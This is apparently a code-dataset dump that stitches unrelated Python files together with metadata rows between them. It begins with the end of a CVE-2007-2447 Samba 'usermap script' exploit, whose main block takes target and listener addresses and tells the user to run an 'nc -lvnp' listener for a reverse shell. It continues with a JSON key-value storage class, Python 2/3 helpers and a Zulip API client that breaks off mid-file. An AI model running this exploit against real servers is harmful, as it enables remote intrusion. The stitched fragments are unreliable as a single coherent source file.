if __name__ == '__main__':
    print("[*] CVE-2007-2447 - Samba usermap script")
    if len(sys.argv) != 5:
        # Wrong arity: show usage plus the listener hint and exit quietly.
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
        print("[-] at another terminal, $ nc -lvnp <LPORT>")
    else:
        print("[+] Connecting")
        # RPORT is usually 139/tcp (NetBIOS session service).
        _, rhost, rport, lhost, lport = sys.argv
        exploit(rhost, rport, lhost, lport)
| 32.735294 | 104 | 0.614555 |
07928766a6137baf3659f56c8651da9cec483cc4 | 1,892 | py | Python | kvstore/storage.py | yuvraj9/key-value-store | 9e2fb5af89a3ef29607f23c1fb73121382252326 | [
"Apache-2.0"
] | 2 | 2021-07-24T01:01:17.000Z | 2021-07-25T18:53:01.000Z | kvstore/storage.py | yuvraj9/key-value-store | 9e2fb5af89a3ef29607f23c1fb73121382252326 | [
"Apache-2.0"
] | null | null | null | kvstore/storage.py | yuvraj9/key-value-store | 9e2fb5af89a3ef29607f23c1fb73121382252326 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import json
from utils import get_logger
logger = get_logger()
class Storage():
    """
    File-backed storage for the key value store.

    The whole store lives in a single JSON document on disk; read() returns
    the decoded document and write() replaces it.
    """

    def __init__(self, path="store.json"):
        """
        Ensure the backing file exists, seeding it with an empty JSON object
        so that the first read() always succeeds.

        Parameters:
            path: Location of the JSON file. Defaults to "store.json" for
                  backward compatibility; parameterized so callers/tests can
                  point at a different file.
        """
        self._path = path
        try:
            if not os.path.exists(self._path):
                # open(..., 'w') both creates the file and lets us seed it;
                # the old extra open(..., 'x') leaked a file handle.
                with open(self._path, 'w') as fh:
                    json.dump({}, fh)
        except Exception as error:
            # Lazy %-formatting: passing `error` without a placeholder in
            # the message breaks the log record's argument formatting.
            logger.error("Unexpected error: %s", error)
            raise Exception("Unable to initialize Storage") from error

    def read(self):
        """
        Load and return the whole store.

        Returns:
            KVSTORE: Data from the file. If new file we return empty json.

        Raises:
            Exception: If the file cannot be opened or parsed.
        """
        try:
            # Reads the file and converts its contents into a json object.
            with open(self._path, 'r') as fh:
                KVSTORE = json.loads(fh.read())
            return KVSTORE
        except Exception as error:
            logger.error("Unexpected error: %s", error)
            raise Exception("Unable to read Storage") from error

    def write(self, data):
        """
        Replace the store's contents with `data`.

        Parameters:
            data: JSON-serializable object to persist.

        Raises:
            Exception: If the file cannot be written.
        """
        try:
            with open(self._path, 'w') as fh:
                json.dump(data, fh)
        except Exception as error:
            logger.error("Unexpected error: %s", error)
            raise Exception("Unable to write in Storage") from error
| 28.666667 | 74 | 0.552326 |
4088c6556087b9d349da882813b2805a90ce00f5 | 524 | py | Python | helpers.py | xtendo-org/imgurup | a760107cbb57bd570f2f9db2de6fa7f43cc206d0 | [
"MIT"
] | null | null | null | helpers.py | xtendo-org/imgurup | a760107cbb57bd570f2f9db2de6fa7f43cc206d0 | [
"MIT"
] | null | null | null | helpers.py | xtendo-org/imgurup | a760107cbb57bd570f2f9db2de6fa7f43cc206d0 | [
"MIT"
] | null | null | null | '''
These functions have nothing to do with the API, they just help ease
issues between Python 2 and 3
'''
def get_input(string):
    ''' Get input from console regardless of python 2 or 3 '''
    try:
        # Python 2: raw_input returns the raw line (input() would eval it).
        return raw_input(string)
    except NameError:
        # Python 3 removed raw_input; its input() behaves like raw_input.
        # Catch only NameError so genuine read errors (EOFError,
        # KeyboardInterrupt) propagate instead of being retried/masked.
        return input(string)
def get_config():
    ''' Create a config parser for reading INI files '''
    try:
        # Python 2 module name.
        import ConfigParser
        return ConfigParser.ConfigParser()
    except ImportError:
        # Python 3 renamed the module to `configparser`. Catch only
        # ImportError so unrelated failures are not silently swallowed.
        import configparser
        return configparser.ConfigParser()
| 24.952381 | 72 | 0.648855 |
81989892de9f9891f871cd840253e292f920132f | 62,777 | py | Python | zulip/zulip/__init__.py | timabbott/python-zulip-api | 31365a8aacb01d11d2f4eb4ac7bf07ac88d43ad8 | [
"Apache-2.0"
] | null | null | null | zulip/zulip/__init__.py | timabbott/python-zulip-api | 31365a8aacb01d11d2f4eb4ac7bf07ac88d43ad8 | [
"Apache-2.0"
] | null | null | null | zulip/zulip/__init__.py | timabbott/python-zulip-api | 31365a8aacb01d11d2f4eb4ac7bf07ac88d43ad8 | [
"Apache-2.0"
] | null | null | null | import argparse
import json
import logging
import optparse
import os
import platform
import random
import sys
import time
import traceback
import types
import urllib.parse
from configparser import ConfigParser
from typing import (
IO,
Any,
Callable,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import distro
import requests
from typing_extensions import Literal
__version__ = "0.8.2"
# Ensure the Python version is supported
assert sys.version_info >= (3, 6)
logger = logging.getLogger(__name__)
# In newer versions, the 'json' attribute is a function, not a property
requests_json_is_function = callable(requests.Response.json)
API_VERSTRING = "v1/"
# An optional parameter to `move_topic` and `update_message` actions
# See eg. https://zulip.com/api/update-message#parameter-propagate_mode
EditPropagateMode = Literal["change_one", "change_all", "change_later"]
# Generally a `reaction_type` is present whenever an emoji is specified:
# - Optional parameters to actions: `add_reaction`, `remove_reaction`
# - Events: "user_status", "reaction", "message", "update_message"
# - Inside each reaction in the `reactions` field of returned message objects.
EmojiType = Literal["realm_emoji", "unicode_emoji", "zulip_extra_emoji"]
# Message flags which may be directly modified by the current user:
# - Updated by `update_message_flags` (and for the `read` flag, also
# the `mark_all_as_read`, `mark_stream_as_read`, and
# `mark_topic_as_read` actions).
# - User is notified of changes via `update_message_flags` events.
# See subset of https://zulip.com/api/update-message-flags#available-flags
ModifiableMessageFlag = Literal["read", "starred", "collapsed"]
# All possible message flags.
# - Generally present in `flags` object of returned message objects.
# - User is notified of changes via "update_message_flags" and `update_message`
# events. The latter is important for clients to learn when a message is
# edited to mention the current user or contain an alert word.
# See https://zulip.com/api/update-message-flags#available-flags
MessageFlag = Literal[
ModifiableMessageFlag,
"mentioned",
"wildcard_mentioned",
"has_alert_word",
"historical",
]
class CountingBackoff:
    def __init__(
        self,
        maximum_retries: int = 10,
        timeout_success_equivalent: Optional[float] = None,
        delay_cap: float = 90.0,
    ) -> None:
        """Track retry attempts for a retry-backoff loop.  Example usage:

            backoff = zulip.CountingBackoff()
            while backoff.keep_going():
                try:
                    something()
                    backoff.succeed()
                except Exception:
                    backoff.fail()

        timeout_success_equivalent handles the case where "success" can
        never be detected automatically: if at least that many seconds pass
        before the next keep_going()/fail(), the previous attempt is
        treated as if it had succeeded.
        """
        self.number_of_retries = 0
        self.maximum_retries = maximum_retries
        self.timeout_success_equivalent = timeout_success_equivalent
        self.last_attempt_time = 0.0
        self.delay_cap = delay_cap

    def keep_going(self) -> bool:
        """Return True while retries remain."""
        self._check_success_timeout()
        remaining = self.maximum_retries - self.number_of_retries
        return remaining > 0

    def succeed(self) -> None:
        """Record a success: reset the retry counter."""
        self.last_attempt_time = time.time()
        self.number_of_retries = 0

    def fail(self) -> None:
        """Record a failure: bump the retry counter, capped at the maximum."""
        self._check_success_timeout()
        self.last_attempt_time = time.time()
        if self.number_of_retries < self.maximum_retries:
            self.number_of_retries += 1

    def _check_success_timeout(self) -> None:
        # Treat a long-enough quiet period since the last attempt as an
        # implicit success (see the constructor docstring).
        if self.timeout_success_equivalent is None:
            return
        if self.last_attempt_time == 0:
            return
        if time.time() - self.last_attempt_time > self.timeout_success_equivalent:
            self.number_of_retries = 0
class RandomExponentialBackoff(CountingBackoff):
    """CountingBackoff variant that also sleeps after each failure.

    The delay grows exponentially with ratio sqrt(2): for scale x it draws
    a random delay in [x, 2x], capped at delay_cap.
    """

    def fail(self) -> None:
        super().fail()
        scale = int(2 ** (self.number_of_retries / 2.0 - 1)) + 1
        jitter = random.randint(1, scale)
        delay = min(scale + jitter, self.delay_cap)
        message = f"Sleeping for {delay}s [max {scale * 2}] before retrying."
        try:
            logger.warning(message)
        except NameError:
            # Fall back to stdout if the module-level logger is unavailable.
            print(message)
        time.sleep(delay)
def _default_client() -> str:
return "ZulipPython/" + __version__
def add_default_arguments(
    parser: argparse.ArgumentParser,
    patch_error_handling: bool = True,
    allow_provisioning: bool = False,
) -> argparse.ArgumentParser:
    """Attach the standard Zulip API options to an argparse parser.

    Args:
        parser: Parser to extend; it is modified in place.
        patch_error_handling: If True, replace ``parser.error`` so usage
            errors print the full help text before exiting with code 2.
        allow_provisioning: If True, also expose ``--provision`` (consumed
            by ``init_from_options``) to install requirements.txt deps.

    Returns:
        The same parser, for call chaining.
    """
    if patch_error_handling:

        def custom_error_handling(self: argparse.ArgumentParser, message: str) -> None:
            # Print the full help (not just the usage line), then exit with
            # argparse's conventional error code 2.
            self.print_help(sys.stderr)
            self.exit(2, f"{self.prog}: error: {message}\n")

        # Monkey-patch the bound method on this parser instance only.
        parser.error = types.MethodType(custom_error_handling, parser)  # type: ignore # patching function

    if allow_provisioning:
        parser.add_argument(
            "--provision",
            action="store_true",
            dest="provision",
            help="install dependencies for this script (found in requirements.txt)",
        )

    group = parser.add_argument_group("Zulip API configuration")
    group.add_argument("--site", dest="zulip_site", help="Zulip server URI", default=None)
    group.add_argument("--api-key", dest="zulip_api_key", action="store")
    group.add_argument(
        "--user", dest="zulip_email", help="Email address of the calling bot or user."
    )
    group.add_argument(
        "--config-file",
        action="store",
        dest="zulip_config_file",
        help="""Location of an ini file containing the above
                information. (default ~/.zuliprc)""",
    )
    group.add_argument("-v", "--verbose", action="store_true", help="Provide detailed output.")
    # --client is deliberately hidden from --help; it overrides the client
    # name reported to the server.
    group.add_argument(
        "--client", action="store", default=None, dest="zulip_client", help=argparse.SUPPRESS
    )
    group.add_argument(
        "--insecure",
        action="store_true",
        dest="insecure",
        help="""Do not verify the server certificate.
                The https connection will not be secure.""",
    )
    group.add_argument(
        "--cert-bundle",
        action="store",
        dest="cert_bundle",
        help="""Specify a file containing either the
                server certificate, or a set of trusted
                CA certificates. This will be used to
                verify the server's identity. All
                certificates should be PEM encoded.""",
    )
    group.add_argument(
        "--client-cert",
        action="store",
        dest="client_cert",
        help="""Specify a file containing a client
                certificate (not needed for most deployments).""",
    )
    group.add_argument(
        "--client-cert-key",
        action="store",
        dest="client_cert_key",
        help="""Specify a file containing the client
                certificate's key (if it is in a separate
                file).""",
    )
    return parser
# This method might seem redundant with `add_default_arguments()`,
# except for the fact that is uses the deprecated `optparse` module.
# We still keep it for legacy support of out-of-tree bots and integrations
# depending on it.
def generate_option_group(parser: optparse.OptionParser, prefix: str = "") -> optparse.OptionGroup:
logging.warning(
"""zulip.generate_option_group is based on optparse, which
is now deprecated. We recommend migrating to argparse and
using zulip.add_default_arguments instead."""
)
group = optparse.OptionGroup(parser, "Zulip API configuration")
group.add_option(f"--{prefix}site", dest="zulip_site", help="Zulip server URI", default=None)
group.add_option(f"--{prefix}api-key", dest="zulip_api_key", action="store")
group.add_option(
f"--{prefix}user",
dest="zulip_email",
help="Email address of the calling bot or user.",
)
group.add_option(
f"--{prefix}config-file",
action="store",
dest="zulip_config_file",
help="Location of an ini file containing the\nabove information. (default ~/.zuliprc)",
)
group.add_option("-v", "--verbose", action="store_true", help="Provide detailed output.")
group.add_option(
f"--{prefix}client",
action="store",
default=None,
dest="zulip_client",
help=optparse.SUPPRESS_HELP,
)
group.add_option(
"--insecure",
action="store_true",
dest="insecure",
help="""Do not verify the server certificate.
The https connection will not be secure.""",
)
group.add_option(
"--cert-bundle",
action="store",
dest="cert_bundle",
help="""Specify a file containing either the
server certificate, or a set of trusted
CA certificates. This will be used to
verify the server's identity. All
certificates should be PEM encoded.""",
)
group.add_option(
"--client-cert",
action="store",
dest="client_cert",
help="""Specify a file containing a client
certificate (not needed for most deployments).""",
)
group.add_option(
"--client-cert-key",
action="store",
dest="client_cert_key",
help="""Specify a file containing the client
certificate's key (if it is in a separate
file).""",
)
return group
def init_from_options(options: Any, client: Optional[str] = None) -> "Client":
if getattr(options, "provision", False):
requirements_path = os.path.abspath(os.path.join(sys.path[0], "requirements.txt"))
try:
import pip
except ImportError:
traceback.print_exc()
print(
"Module `pip` is not installed. To install `pip`, follow the instructions here: "
"https://pip.pypa.io/en/stable/installing/"
)
sys.exit(1)
if not pip.main(["install", "--upgrade", "--requirement", requirements_path]):
print(
"{color_green}You successfully provisioned the dependencies for {script}.{end_color}".format(
color_green="\033[92m",
end_color="\033[0m",
script=os.path.splitext(os.path.basename(sys.argv[0]))[0],
)
)
sys.exit(0)
if options.zulip_client is not None:
client = options.zulip_client
elif client is None:
client = _default_client()
return Client(
email=options.zulip_email,
api_key=options.zulip_api_key,
config_file=options.zulip_config_file,
verbose=options.verbose,
site=options.zulip_site,
client=client,
cert_bundle=options.cert_bundle,
insecure=options.insecure,
client_cert=options.client_cert,
client_cert_key=options.client_cert_key,
)
def get_default_config_filename() -> Optional[str]:
    """Return the default config path (~/.zuliprc), or None without $HOME.

    Raises ZulipError if only the pre-rename ~/.humbugrc exists, telling
    the user to move it.
    """
    home = os.environ.get("HOME")
    if home is None:
        return None
    config_file = os.path.join(home, ".zuliprc")
    legacy_file = os.path.join(home, ".humbugrc")
    if not os.path.exists(config_file) and os.path.exists(legacy_file):
        raise ZulipError(
            "The Zulip API configuration file is now ~/.zuliprc; please run:\n\n"
            "  mv ~/.humbugrc ~/.zuliprc\n"
        )
    return config_file
def validate_boolean_field(field: Optional[str]) -> Union[bool, None]:
    """Map "true"/"false" (case-insensitive) to a bool; anything else to None."""
    if not isinstance(field, str):
        return None
    return {"true": True, "false": False}.get(field.lower())
class ZulipError(Exception):
    """Base class for all errors raised by this client library."""

    pass


class ConfigNotFoundError(ZulipError):
    """Raised when required credentials/config or referenced cert files are missing."""

    pass


class MissingURLError(ZulipError):
    """Raised when no Zulip server URL could be determined."""

    pass


class UnrecoverableNetworkError(ZulipError):
    """Raised for network failures that retrying cannot fix (SSL errors,
    never having reached the server at all)."""

    pass
class Client:
    def __init__(
        self,
        email: Optional[str] = None,
        api_key: Optional[str] = None,
        config_file: Optional[str] = None,
        verbose: bool = False,
        retry_on_errors: bool = True,
        site: Optional[str] = None,
        client: Optional[str] = None,
        cert_bundle: Optional[str] = None,
        insecure: Optional[bool] = None,
        client_cert: Optional[str] = None,
        client_cert_key: Optional[str] = None,
    ) -> None:
        """Resolve credentials/configuration and initialize the client.

        Each setting is resolved in priority order: explicit constructor
        argument, then the matching ZULIP_* environment variable, then the
        [api] section of the config file (default ~/.zuliprc).

        Raises:
            ZulipError: invalid "insecure" value in env or config file.
            ConfigNotFoundError: missing credentials or missing cert files.
            MissingURLError: no server URL could be determined.
        """
        if client is None:
            client = _default_client()

        # Normalize user-specified path
        if config_file is not None:
            config_file = os.path.abspath(os.path.expanduser(config_file))
        # Fill values from Environment Variables if not available in Constructor
        if config_file is None:
            config_file = os.environ.get("ZULIP_CONFIG")
        if api_key is None:
            api_key = os.environ.get("ZULIP_API_KEY")
        if email is None:
            email = os.environ.get("ZULIP_EMAIL")
        if site is None:
            site = os.environ.get("ZULIP_SITE")
        if client_cert is None:
            client_cert = os.environ.get("ZULIP_CERT")
        if client_cert_key is None:
            client_cert_key = os.environ.get("ZULIP_CERT_KEY")
        if cert_bundle is None:
            cert_bundle = os.environ.get("ZULIP_CERT_BUNDLE")
        if insecure is None:
            # Be quite strict about what is accepted so that users don't
            # disable security unintentionally.
            insecure_setting = os.environ.get("ZULIP_ALLOW_INSECURE")
            if insecure_setting is not None:
                insecure = validate_boolean_field(insecure_setting)
                if insecure is None:
                    raise ZulipError(
                        "The ZULIP_ALLOW_INSECURE environment "
                        "variable is set to '{}', it must be "
                        "'true' or 'false'".format(insecure_setting)
                    )
        if config_file is None:
            config_file = get_default_config_filename()

        if config_file is not None and os.path.exists(config_file):
            config = ConfigParser()
            with open(config_file) as f:
                # Second argument is the source name reported in parse errors.
                config.read_file(f, config_file)
            if api_key is None:
                api_key = config.get("api", "key")
            if email is None:
                email = config.get("api", "email")
            if site is None and config.has_option("api", "site"):
                site = config.get("api", "site")
            if client_cert is None and config.has_option("api", "client_cert"):
                client_cert = config.get("api", "client_cert")
            if client_cert_key is None and config.has_option("api", "client_cert_key"):
                client_cert_key = config.get("api", "client_cert_key")
            if cert_bundle is None and config.has_option("api", "cert_bundle"):
                cert_bundle = config.get("api", "cert_bundle")
            if insecure is None and config.has_option("api", "insecure"):
                # Be quite strict about what is accepted so that users don't
                # disable security unintentionally.
                insecure_setting = config.get("api", "insecure")
                insecure = validate_boolean_field(insecure_setting)
                if insecure is None:
                    raise ZulipError(
                        "insecure is set to '{}', it must be "
                        "'true' or 'false' if it is used in {}".format(
                            insecure_setting, config_file
                        )
                    )
        elif None in (api_key, email):
            raise ConfigNotFoundError(
                f"api_key or email not specified and file {config_file} does not exist"
            )

        assert api_key is not None and email is not None
        self.api_key = api_key
        self.email = email
        self.verbose = verbose
        if site is not None:
            # Infer the scheme: plain HTTP only for localhost, HTTPS otherwise.
            if site.startswith("localhost"):
                site = "http://" + site
            elif not site.startswith("http"):
                site = "https://" + site
            # Remove trailing "/"s from site to simplify the below logic for adding "/api"
            site = site.rstrip("/")
            self.base_url = site
        else:
            raise MissingURLError("Missing Zulip server URL; specify via --site or ~/.zuliprc.")

        if not self.base_url.endswith("/api"):
            self.base_url += "/api"
        self.base_url += "/"

        self.retry_on_errors = retry_on_errors
        self.client_name = client

        # tls_verification mirrors requests' `verify` argument: False to
        # disable, True for system CAs, or a path to a CA bundle file.
        if insecure:
            logger.warning(
                "Insecure mode enabled. The server's SSL/TLS "
                "certificate will not be validated, making the "
                "HTTPS connection potentially insecure"
            )
            self.tls_verification = False  # type: Union[bool, str]
        elif cert_bundle is not None:
            if not os.path.isfile(cert_bundle):
                raise ConfigNotFoundError(f"tls bundle '{cert_bundle}' does not exist")
            self.tls_verification = cert_bundle
        else:
            # Default behavior: verify against system CA certificates
            self.tls_verification = True

        # Validate client-cert configuration: a key alone is useless, and
        # any referenced file must actually exist.
        if client_cert is None:
            if client_cert_key is not None:
                raise ConfigNotFoundError(
                    "client cert key '%s' specified, but no client cert public part provided"
                    % (client_cert_key,)
                )
        else:  # we have a client cert
            if not os.path.isfile(client_cert):
                raise ConfigNotFoundError(f"client cert '{client_cert}' does not exist")
            if client_cert_key is not None:
                if not os.path.isfile(client_cert_key):
                    raise ConfigNotFoundError(f"client cert key '{client_cert_key}' does not exist")
        self.client_cert = client_cert
        self.client_cert_key = client_cert_key

        # The requests.Session is created lazily by ensure_session().
        self.session = None  # type: Optional[requests.Session]

        self.has_connected = False

        # NOTE: this presumably performs an API request, so constructing a
        # Client contacts the server to learn its version/feature level.
        server_settings = self.get_server_settings()
        self.zulip_version: Optional[str] = server_settings.get("zulip_version")
        self.feature_level: int = server_settings.get("zulip_feature_level", 0)
        assert self.zulip_version is not None
def ensure_session(self) -> None:
# Check if the session has been created already, and return
# immediately if so.
if self.session:
return
# Build a client cert object for requests
if self.client_cert_key is not None:
assert self.client_cert is not None # Otherwise ZulipError near end of __init__
client_cert = (
self.client_cert,
self.client_cert_key,
) # type: Union[None, str, Tuple[str, str]]
else:
client_cert = self.client_cert
# Actually construct the session
session = requests.Session()
session.auth = requests.auth.HTTPBasicAuth(self.email, self.api_key)
session.verify = self.tls_verification
session.cert = client_cert
session.headers.update({"User-agent": self.get_user_agent()})
self.session = session
def get_user_agent(self) -> str:
vendor = ""
vendor_version = ""
try:
vendor = platform.system()
vendor_version = platform.release()
except OSError:
# If the calling process is handling SIGCHLD, platform.system() can
# fail with an IOError. See http://bugs.python.org/issue9127
pass
if vendor == "Linux":
vendor, vendor_version, dummy = distro.linux_distribution()
elif vendor == "Windows":
vendor_version = platform.win32_ver()[1]
elif vendor == "Darwin":
vendor_version = platform.mac_ver()[0]
return "{client_name} ({vendor}; {vendor_version})".format(
client_name=self.client_name,
vendor=vendor,
vendor_version=vendor_version,
)
def do_api_query(
self,
orig_request: Mapping[str, Any],
url: str,
method: str = "POST",
longpolling: bool = False,
files: Optional[List[IO[Any]]] = None,
timeout: Optional[float] = None,
) -> Dict[str, Any]:
if files is None:
files = []
if longpolling:
# When long-polling, set timeout to 90 sec as a balance
# between a low traffic rate and a still reasonable latency
# time in case of a connection failure.
request_timeout = 90.0
else:
# Otherwise, 15s should be plenty of time.
request_timeout = 15.0 if not timeout else timeout
request = {}
req_files = []
for (key, val) in orig_request.items():
if isinstance(val, str) or isinstance(val, str):
request[key] = val
else:
request[key] = json.dumps(val)
for f in files:
req_files.append((f.name, f))
self.ensure_session()
assert self.session is not None
query_state = {
"had_error_retry": False,
"request": request,
"failures": 0,
} # type: Dict[str, Any]
def error_retry(error_string: str) -> bool:
if not self.retry_on_errors or query_state["failures"] >= 10:
return False
if self.verbose:
if not query_state["had_error_retry"]:
sys.stdout.write(
"zulip API(%s): connection error%s -- retrying."
% (
url.split(API_VERSTRING, 2)[0],
error_string,
)
)
query_state["had_error_retry"] = True
else:
sys.stdout.write(".")
sys.stdout.flush()
query_state["request"]["dont_block"] = json.dumps(True)
time.sleep(1)
query_state["failures"] += 1
return True
def end_error_retry(succeeded: bool) -> None:
if query_state["had_error_retry"] and self.verbose:
if succeeded:
print("Success!")
else:
print("Failed!")
while True:
try:
if method == "GET":
kwarg = "params"
else:
kwarg = "data"
kwargs = {kwarg: query_state["request"]}
if files:
kwargs["files"] = req_files
# Actually make the request!
res = self.session.request(
method,
urllib.parse.urljoin(self.base_url, url),
timeout=request_timeout,
**kwargs,
)
self.has_connected = True
# On 50x errors, try again after a short sleep
if str(res.status_code).startswith("5"):
if error_retry(f" (server {res.status_code})"):
continue
# Otherwise fall through and process the python-requests error normally
except (requests.exceptions.Timeout, requests.exceptions.SSLError) as e:
# Timeouts are either a Timeout or an SSLError; we
# want the later exception handlers to deal with any
# non-timeout other SSLErrors
if (
isinstance(e, requests.exceptions.SSLError)
and str(e) != "The read operation timed out"
):
raise UnrecoverableNetworkError("SSL Error")
if longpolling:
# When longpolling, we expect the timeout to fire,
# and the correct response is to just retry
continue
else:
end_error_retry(False)
raise
except requests.exceptions.ConnectionError:
if not self.has_connected:
# If we have never successfully connected to the server, don't
# go into retry logic, because the most likely scenario here is
# that somebody just hasn't started their server, or they passed
# in an invalid site.
raise UnrecoverableNetworkError("cannot connect to server " + self.base_url)
if error_retry(""):
continue
end_error_retry(False)
raise
except Exception:
# We'll split this out into more cases as we encounter new bugs.
raise
try:
if requests_json_is_function:
json_result = res.json()
else:
json_result = res.json
except Exception:
json_result = None
if json_result is not None:
end_error_retry(True)
return json_result
end_error_retry(False)
return {
"msg": "Unexpected error from the server",
"result": "http-error",
"status_code": res.status_code,
}
def call_endpoint(
self,
url: Optional[str] = None,
method: str = "POST",
request: Optional[Dict[str, Any]] = None,
longpolling: bool = False,
files: Optional[List[IO[Any]]] = None,
timeout: Optional[float] = None,
) -> Dict[str, Any]:
if request is None:
request = dict()
marshalled_request = {}
for (k, v) in request.items():
if v is not None:
marshalled_request[k] = v
versioned_url = API_VERSTRING + (url if url is not None else "")
return self.do_api_query(
marshalled_request,
versioned_url,
method=method,
longpolling=longpolling,
files=files,
timeout=timeout,
)
    def call_on_each_event(
        self,
        callback: Callable[[Dict[str, Any]], None],
        event_types: Optional[List[str]] = None,
        narrow: Optional[List[List[str]]] = None,
        **kwargs: object,
    ) -> None:
        """Invoke `callback` on every event received, forever.

        Registers an event queue (restricted by `event_types` and
        `narrow` when given; extra keyword arguments are forwarded to
        register()), then long-polls for events, re-registering whenever
        the queue is lost.  This function never returns.
        """
        if narrow is None:
            narrow = []

        def do_register() -> Tuple[str, int]:
            # Register an event queue, retrying once per second until it
            # succeeds; returns (queue_id, last_event_id).
            while True:
                if event_types is None:
                    res = self.register(None, None, **kwargs)
                else:
                    res = self.register(event_types, narrow, **kwargs)
                if "error" in res["result"]:
                    if self.verbose:
                        print("Server returned error:\n{}".format(res["msg"]))
                    time.sleep(1)
                else:
                    return (res["queue_id"], res["last_event_id"])

        queue_id = None
        # Make long-polling requests with `get_events`. Once a request
        # has received an answer, pass it to the callback and before
        # making a new long-polling request.
        while True:
            if queue_id is None:
                (queue_id, last_event_id) = do_register()
            try:
                res = self.get_events(queue_id=queue_id, last_event_id=last_event_id)
            except (
                requests.exceptions.Timeout,
                requests.exceptions.SSLError,
                requests.exceptions.ConnectionError,
            ):
                # Transient network failure: wait a beat and long-poll again.
                if self.verbose:
                    print(f"Connection error fetching events:\n{traceback.format_exc()}")
                # TODO: Make this use our backoff library
                time.sleep(1)
                continue
            except Exception:
                print(f"Unexpected error:\n{traceback.format_exc()}")
                # TODO: Make this use our backoff library
                time.sleep(1)
                continue
            if "error" in res["result"]:
                if res["result"] == "http-error":
                    if self.verbose:
                        print("HTTP error fetching events -- probably a server restart")
                else:
                    if self.verbose:
                        print("Server returned error:\n{}".format(res["msg"]))
                    # Eventually, we'll only want the
                    # BAD_EVENT_QUEUE_ID check, but we check for the
                    # old string to support legacy Zulip servers. We
                    # should remove that legacy check in 2019.
                    if res.get("code") == "BAD_EVENT_QUEUE_ID" or res["msg"].startswith(
                        "Bad event queue id:"
                    ):
                        # Our event queue went away, probably because
                        # we were asleep or the server restarted
                        # abnormally. We may have missed some
                        # events while the network was down or
                        # something, but there's not really anything
                        # we can do about it other than resuming
                        # getting new ones.
                        #
                        # Reset queue_id to register a new event queue.
                        queue_id = None
                # Add a pause here to cover against potential bugs in this library
                # causing a DoS attack against a server when getting errors.
                # TODO: Make this back off exponentially.
                time.sleep(1)
                continue
            for event in res["events"]:
                # Track the highest event id seen so the next poll only
                # returns newer events.
                last_event_id = max(last_event_id, int(event["id"]))
                callback(event)
def call_on_each_message(
self, callback: Callable[[Dict[str, Any]], None], **kwargs: object
) -> None:
def event_callback(event: Dict[str, Any]) -> None:
if event["type"] == "message":
callback(event["message"])
self.call_on_each_event(event_callback, ["message"], None, **kwargs)
def get_messages(self, message_filters: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/get-messages for example usage
"""
return self.call_endpoint(url="messages", method="GET", request=message_filters)
def check_messages_match_narrow(self, **request: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.check_messages_match_narrow(msg_ids=[11, 12],
narrow=[{'operator': 'has', 'operand': 'link'}]
)
{'result': 'success', 'msg': '', 'messages': [{...}, {...}]}
"""
return self.call_endpoint(url="messages/matches_narrow", method="GET", request=request)
def get_raw_message(self, message_id: int) -> Dict[str, str]:
"""
See examples/get-raw-message for example usage
"""
return self.call_endpoint(url=f"messages/{message_id}", method="GET")
def send_message(self, message_data: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/send-message for example usage.
"""
return self.call_endpoint(
url="messages",
request=message_data,
)
def upload_file(self, file: IO[Any]) -> Dict[str, Any]:
"""
See examples/upload-file for example usage.
"""
return self.call_endpoint(url="user_uploads", files=[file])
def get_attachments(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_attachments()
{'result': 'success', 'msg': '', 'attachments': [{...}, {...}]}
"""
return self.call_endpoint(url="attachments", method="GET")
def update_message(self, message_data: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/edit-message for example usage.
"""
return self.call_endpoint(
url="messages/%d" % (message_data["message_id"],),
method="PATCH",
request=message_data,
)
def delete_message(self, message_id: int) -> Dict[str, Any]:
"""
See examples/delete-message for example usage.
"""
return self.call_endpoint(url=f"messages/{message_id}", method="DELETE")
def update_message_flags(self, update_data: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/update-flags for example usage.
"""
return self.call_endpoint(url="messages/flags", method="POST", request=update_data)
def mark_all_as_read(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.mark_all_as_read()
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="mark_all_as_read",
method="POST",
)
def mark_stream_as_read(self, stream_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.mark_stream_as_read(42)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="mark_stream_as_read",
method="POST",
request={"stream_id": stream_id},
)
    def mark_topic_as_read(self, stream_id: int, topic_name: str) -> Dict[str, Any]:
        """
        Mark all messages in one topic of a stream as read.

        Example usage:

        >>> client.mark_topic_as_read(42, 'new coffee machine')
        {'result': 'success', 'msg': ''}
        """
        return self.call_endpoint(
            url="mark_topic_as_read",
            method="POST",
            request={
                "stream_id": stream_id,
                "topic_name": topic_name,
            },
        )
def get_message_history(self, message_id: int) -> Dict[str, Any]:
"""
See examples/message-history for example usage.
"""
return self.call_endpoint(url=f"messages/{message_id}/history", method="GET")
def add_reaction(self, reaction_data: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.add_reaction({
'message_id': 100,
'emoji_name': 'joy',
'emoji_code': '1f602',
'reaction_type': 'unicode_emoji'
})
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="messages/{}/reactions".format(reaction_data["message_id"]),
method="POST",
request=reaction_data,
)
def remove_reaction(self, reaction_data: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.remove_reaction({
'message_id': 100,
'emoji_name': 'joy',
'emoji_code': '1f602',
'reaction_type': 'unicode_emoji'
})
{'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url="messages/{}/reactions".format(reaction_data["message_id"]),
method="DELETE",
request=reaction_data,
)
def get_realm_emoji(self) -> Dict[str, Any]:
"""
See examples/realm-emoji for example usage.
"""
return self.call_endpoint(url="realm/emoji", method="GET")
def upload_custom_emoji(self, emoji_name: str, file_obj: IO[Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.upload_custom_emoji(emoji_name, file_obj)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(f"realm/emoji/{emoji_name}", method="POST", files=[file_obj])
def delete_custom_emoji(self, emoji_name: str) -> Dict[str, Any]:
"""
Example usage:
